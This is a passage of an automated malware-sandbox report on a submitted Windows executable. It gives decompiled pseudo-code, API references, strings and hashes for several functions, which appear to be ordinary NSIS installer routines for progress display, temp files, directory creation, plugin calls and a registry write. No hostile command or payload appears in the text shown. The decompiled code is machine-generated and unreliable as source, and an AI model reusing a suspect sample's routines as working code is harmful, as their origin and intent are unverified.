							goto L33;
						}
						_a16 = _a16 - _t92;
						 *0x40ce28 = 0x40cea0;
						 *0x40ce2c = _t92;
						while(1) {
							 *0x40ce30 = _t81;
							 *0x40ce34 = _v12; // executed
							_t69 = E004067A7(0x40ce10); // executed
							_v20 = _t69;
							if(_t69 < 0) {
								break;
							}
							_t93 =  *0x40ce30; // 0x410ea0
							_t94 = _t93 - _t81;
							_t70 = GetTickCount();
							_t89 = _t70;
							if(( *0x42a2d4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v148, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t95 = _t95 + 0xc;
								E004052B0(0,  &_v148); // executed
								_v16 = _t89;
							}
							if(_t94 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L43;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t94;
									_v12 = _v12 - _t94;
									_t81 =  *0x40ce30; // 0x410ea0
									L23:
									if(_v20 != 1) {
										continue;
									}
									goto L43;
								}
								_t71 = E00405DF0(_a8, _t81, _t94); // executed
								if(_t71 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t94;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L34;
					}
					goto L33;
				}
			}

0x00403105
0x00403109
0x0040310c
0x00403111
0x00403113
0x00403113
0x0040311a
0x0040311e
0x00403122
0x00403124
0x00403124
0x00403129
0x0040312e
0x00403139
0x00403139
0x0040314b
0x00403296
0x00403296
0x00000000
0x00403151
0x00403155
0x00403281
0x004032ca
0x0040329b
0x004032a1
0x004032a3
0x004032a3
0x004032b4
0x00000000
0x004032b6
0x004032c2
0x0040327b
0x0040327b
0x00403298
0x00403298
0x00000000
0x00403298
0x004032c4
0x004032c7
0x00000000
0x004032c7
0x004032b4
0x004032d5
0x00000000
0x004032d5
0x00403286
0x00403288
0x00403288
0x00403294
0x004032d2
0x00000000
0x00000000
0x00000000
0x00000000
0x00403294
0x00403166
0x00403169
0x0040316e
0x0040316e
0x00403178
0x0040317b
0x00000000
0x00000000
0x00000000
0x00000000
0x00403181
0x00403181
0x00403181
0x00403189
0x0040318b
0x0040318b
0x0040319c
0x00000000
0x00000000
0x004031a2
0x004031a5
0x004031ab
0x004031b1
0x004031b9
0x004031bf
0x004031c4
0x004031cb
0x004031ce
0x00000000
0x00000000
0x004031d4
0x004031da
0x004031dc
0x004031e9
0x004031eb
0x0040321c
0x00403222
0x0040322e
0x00403233
0x00403233
0x00403238
0x0040326f
0x00000000
0x00000000
0x00000000
0x0040323a
0x0040323e
0x00403253
0x00403256
0x00403259
0x0040325f
0x00403263
0x00000000
0x00000000
0x00000000
0x00403269
0x00403245
0x0040324c
0x00000000
0x00000000
0x0040324e
0x00000000
0x0040324e
0x00403238
0x00403277
0x00000000
0x00403277
0x00000000
0x00403181

APIs

GetTickCount.KERNEL32 ref: 0040315B
GetTickCount.KERNEL32 ref: 004031DC
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00403209
wsprintfW.USER32 ref: 0040321C

Strings

... %d%%, xrefs: 00403216

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
Instruction ID: 2f3e22fda6cf622f8bf4b8160786ddb998526db62ce5623fe0a3028d3f0862ac
Opcode Fuzzy Hash: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
Instruction Fuzzy Hash: A3517171900219EBCB10DF65DA48B9F3B68AF45366F1441BFF805B72C0D7789E508BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040577F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040577F(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f0;
				_v36.Group = 0x4083f0;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e0;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x0040578a
0x0040578e
0x00405791
0x00405797
0x0040579b
0x0040579f
0x004057a7
0x004057ae
0x004057b4
0x004057bb
0x004057c2
0x004057ca
0x004057cc
0x00000000
0x004057cc
0x004057d6
0x004057dd
0x004057f3
0x00000000
0x00000000
0x00000000
0x004057f5
0x004057f9

APIs

CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
GetLastError.KERNEL32 ref: 004057D6
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
GetLastError.KERNEL32 ref: 004057F5

Strings

C:\Users\user\Desktop, xrefs: 0040577F

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-3370423016
Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction ID: a96db4d766433405fa600e453148f039d13b259e3fca1cfbe784ddd29ae139cf
Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction Fuzzy Hash: 52010871C10619DADF01DFA4CD44BEFBBB8EB14355F00407AD545B6281E7789608DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405D6D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405D6D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a55c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00405d73
0x00405d79
0x00405d7a
0x00405d7a
0x00405d7f
0x00405d80
0x00405d83
0x00405d88
0x00405d8b
0x00405d95
0x00405da2
0x00405da6
0x00405dae
0x00000000
0x00000000
0x00405db2
0x00000000
0x00405db4
0x00405db4
0x00405db4
0x00405db7
0x00405dba
0x00405dba
0x00405dbd
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405D8B
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\64Tgzu2FKh.exe",0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75333420,00403589), ref: 00405DA6

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405D72, 00405D76
nsa, xrefs: 00405D7A
"C:\Users\user\Desktop\64Tgzu2FKh.exe", xrefs: 00405D6D

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\64Tgzu2FKh.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3312185324
Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction ID: 85bdb6a116c51bdc328f0f27a7d8b9c38e3c9c6247ffb38d9ffcafb3e867c1bf
Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction Fuzzy Hash: D2F03076601704FBEB009F69ED09F9FB7ADEF95710F10803BE901E7250E6B0A9548B64

Uniqueness

Uniqueness Score: -1.00%

Function 100022D0 Relevance: 7.6, APIs: 5, Instructions: 135
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E100022D0(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed int* _t42;
				signed int* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[6];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[6] = _t41;
							goto L12;
						} else {
							_t37 = E100012BA(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E10001243();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[2]); // 0x1020
						_t42 = _t13;
						if(_t51[1] != 0xffffffff) {
						}
						_t38 =  *_t51;
						_t51[7] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52); // executed
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M10002447))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E10001311(__ebp);
									goto L21;
								case 2:
									 *__edi = E10001311(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x1000406c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
									goto L27;
								case 4:
									__eax = E1000122C(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E10001311(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									asm("cdq");
									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E1000122C(0x10004044);
					goto L10;
				}
			}

0x100022e4
0x100022e8
0x100022f3
0x100022f3
0x100022fa
0x100022ff
0x00000000
0x00000000
0x10002303
0x10002306
0x00000000
0x00000000
0x1000230b
0x10002316
0x10002326
0x00000000
0x1000231d
0x1000231f
0x10002335
0x00000000
0x10002335
0x1000230d
0x1000230d
0x10002336
0x10002336
0x10002338
0x1000233c
0x1000233c
0x1000233f
0x1000233f
0x10002347
0x1000234e
0x10002351
0x10002410
0x10002411
0x1000241c
0x10002446
0x10002446
0x1000242c
0x10002438
0x1000242e
0x1000242e
0x1000242e
0x00000000
0x10002357
0x10002357
0x00000000
0x1000235e
0x00000000
0x00000000
0x10002366
0x00000000
0x00000000
0x10002374
0x10002376
0x00000000
0x00000000
0x10002397
0x1000239d
0x100023a0
0x100023a2
0x100023b2
0x00000000
0x00000000
0x1000237f
0x10002384
0x10002387
0x10002388
0x00000000
0x00000000
0x100023be
0x100023c4
0x100023c5
0x100023c8
0x100023c9
0x100023cb
0x00000000
0x00000000
0x100023d7
0x100023da
0x100023e6
0x100023e8
0x00000000
0x00000000
0x100023f4
0x10002400
0x10002403
0x10002405
0x10002408
0x00000000
0x00000000
0x10002357
0x10002351
0x1000232b
0x10002330
0x00000000
0x10002330

APIs

GlobalFree.KERNELBASE(00000000), ref: 10002411

Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C

GlobalAlloc.KERNEL32(00000040), ref: 10002397
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2

Memory Dump Source

Source File: 00000000.00000002.1615522469.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1615494568.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1615549663.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1615572232.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_64Tgzu2FKh.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65

Uniqueness

Uniqueness Score: -1.00%

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				void* _t36;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
				_push(1);
				_t34 = E10001B18();
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E10002286(_t50);
					}
					_push(_t50);
					E100022D0(_t65);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100024A4(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x1018; // 0x1018
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100015B4(_t50);
								_t15 = _t50 + 0x1018; // 0x1018
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
								 *_t70 = 4;
								E100024A4(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100024A4(_t50);
							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E10002467(_t50);
							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x1008);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
								_t34 = E1000153D( *0x10004068);
							}
						}
						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							_t36 = GlobalFree(_t50); // executed
							return _t36;
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002B57(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E1000289C(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002640(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x10001759
0x10001759
0x10001759
0x10001763
0x1000176b
0x10001778
0x10001786
0x10001789
0x1000178b
0x10001790
0x10001795
0x100018a8
0x100018a8
0x1000179b
0x1000179f
0x100017a2
0x100017a7
0x100017a8
0x100017a9
0x100017af
0x100017b5
0x100017e5
0x100017ec
0x10001810
0x1000184f
0x10001812
0x10001812
0x10001813
0x10001816
0x1000181c
0x10001820
0x10001823
0x10001828
0x10001828
0x1000182f
0x10001835
0x1000183b
0x10001847
0x10001848
0x1000184b
0x100017ee
0x100017ef
0x10001804
0x10001804
0x10001859
0x1000185c
0x10001869
0x10001870
0x10001878
0x1000187b
0x1000187b
0x10001878
0x10001888
0x10001890
0x10001895
0x10001888
0x1000189d
0x00000000
0x1000189f
0x100018a0
0x00000000
0x100018a0
0x1000189d
0x100017b9
0x100017bc
0x100017da
0x00000000
0x00000000
0x100017dd
0x100017e2
0x100017e2
0x100017e4
0x00000000
0x100017e4
0x100017be
0x100017bf
0x100017c7
0x100017c8
0x00000000
0x100017c8
0x100017c1
0x100017c2
0x100017d0
0x00000000
0x100017d0
0x100017c5
0x00000000
0x00000000
0x00000000
0x100017c5

APIs

Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D

GlobalFree.KERNEL32(00000000), ref: 10001804
FreeLibrary.KERNEL32(?), ref: 1000187B
GlobalFree.KERNELBASE(00000000), ref: 100018A0

Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8

Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2

Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD

Strings

, xrefs: 10001881

Memory Dump Source

Source File: 00000000.00000002.1615522469.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1615494568.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1615549663.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1615572232.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_64Tgzu2FKh.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 0483f3173a4470b9256ae29dd6c5e6dea881cc340ce9ef3905353ea367717f55
Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
Opcode Fuzzy Hash: 0483f3173a4470b9256ae29dd6c5e6dea881cc340ce9ef3905353ea367717f55
Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761

Uniqueness

Uniqueness Score: -1.00%

Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004023DE(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x18));
				_t34 = __eax;
				 *(_t39 - 0x4c) =  *(_t39 - 0x14);
				 *(_t39 - 0x3c) = E00402C37(2);
				_t20 = E00402C37(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402CC7(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402C37(0x23);
						_t24 = lstrlenW(0x40b5a8) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5a8 = E00402C15(3);
						 *((intOrPtr*)(_t39 - 0x30)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004030FA( *((intOrPtr*)(_t39 - 0x1c)), _t30, 0x40b5a8, 0x1800);
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x3c), _t30,  *(_t39 - 0x4c), 0x40b5a8, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
				return 0;
			}

0x004023de
0x004023de
0x004023de
0x004023e1
0x004023e8
0x004023f2
0x004023f5
0x004023fe
0x00402405
0x0040240c
0x0040240f
0x00402415
0x0040241f
0x00402423
0x0040242e
0x0040242e
0x00402435
0x0040243f
0x00402445
0x00402448
0x00402448
0x0040244c
0x00402458
0x00402458
0x00402469
0x00402471
0x00402473
0x00402473
0x00402476
0x00402551
0x00402551
0x00402ac2
0x00402ace

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,00000023,00000011,00000002), ref: 00402429
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,00000000,00000011,00000002), ref: 00402469
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,00000000,00000011,00000002), ref: 00402551

Strings

C:\Users\user\AppData\Local\Temp\nseEF5D.tmp, xrefs: 0040241A, 0040243F, 00402453, 0040245E

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp
API String ID: 2655323295-3545633897
Opcode ID: f9d37ecf99ac56edafcaa2f1cd47f4937662206fa3ab36d745cd74ad20f42250
Instruction ID: f6ab6de36865f89e990f87fcf60bb758a602a58abc301ab7ae12c482c30fe319
Opcode Fuzzy Hash: f9d37ecf99ac56edafcaa2f1cd47f4937662206fa3ab36d745cd74ad20f42250
Instruction Fuzzy Hash: 7C118171E00108BEEB10AFA5DE49EAEBAB8EB54354F11803AF505F71D1DBB84D419B58

